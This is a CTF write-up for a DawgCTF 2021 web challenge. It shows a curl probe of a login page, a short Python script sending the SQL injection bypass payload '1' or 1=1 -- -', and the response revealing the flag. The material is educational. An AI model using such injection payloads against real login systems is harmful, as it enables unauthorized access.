Initial attempts to open the link failed in all my browsers..
decided to use Curl
1┌─[skoki@parrot]─[~/Desktop/CTFs/DawgCTF/Women/images]
2└──╼ $curl -i http://umbccd.io:6100
3HTTP/1.1 200 OK
4Date: Tue, 11 May 2021 10:24:07 GMT
5Server: Apache/2.4.38 (Debian)
6X-Powered-By: PHP/7.4.16
7Set-Cookie: PHPSESSID=ed76bcb3c7d58c8997eb16b9090fc0d2; path=/
8Expires: Thu, 19 Nov 1981 08:52:00 GMT
9Cache-Control: no-store, no-cache, must-revalidate
10Pragma: no-cache
11Vary: Accept-Encoding
12Content-Length: 1072
13Content-Type: text/html; charset=UTF-8
14
15-----snip------
16 <em></em> <form action="/" method="POST">
17 <div class="form-group">
18 <label for="username">Username</label>
19 <input type="text" class="form-control" name="username" id="username" placeholder="Username" required>
20 </div>
21 <div class="form-group">
22 <label for="password">Password</label>
23 <input type="password" class="form-control" name="password" id="password" placeholder="Password" required>
24 </div>
25 <input type="submit" class="btn btn-primary" id="submit" value="Log In"></input>
26----snip-----
the important part was this login form …to which we decided to test for sqli login bypass
we created a simple python script
1import requests
2
3url = "http://umbccd.io:6100"
4
5data = {
6 "username": "1' or 1=1 -- -",
7 "password": "lool"
8}
9
10res = requests.post(url, data=data)
11print(res.text)
in the response we get our flag
1$ python final.py
2
3<!DOCTYPE html>
4<head>
5 <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css" integrity="sha384-JcKb8q3iqJ61gNV9KGb8thSsNjpSL0n8PARn9HuZOnIxN0hoP+VmmDGMN5t9UJ0Z" crossorigin="anonymous">
6 <link rel="stylesheet" href="ourStyles.css">
7</head>
8<body>
9 <nav class="navbar navbar-expand-md navbar-dark bg-dark mb-4">
10 <a class="navbar-brand" href="#">
11 UMBC Grades Server
12 </a>
13 <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarCollapse" aria-controls="navbarCollapse" aria-expanded="false" aria-label="Toggle navigation">
14 <span class="navbar-toggler-icon"></span>
15 </button>
16 </nav>
17
18 <main role="main" class="container">
19 <h1>Welcome, President Hrabowski</h1>
20 <p class="lead">Click the button below to change all students' grades to an A</p>
21 <button type="button" class="btn-lg btn-danger centered" onClick="changeGrades()">DANGER: All students will get As for the semester</button>
22 <img src="trueGrit.jpg" class="centered" id="trueGrit" name="DawgCTF{WeLoveTrueGrit}" style="display:none;">
23 </main>
24
25 <script>
26 function changeGrades() {
27 document.getElementById('trueGrit').style.display='block';
28 }
29 </script>
30</body>
Flag : DawgCTF{WeLoveTrueGrit}
That’s all for now,thanks for reading
for any corrections or suggestions kindly reach out k0imet_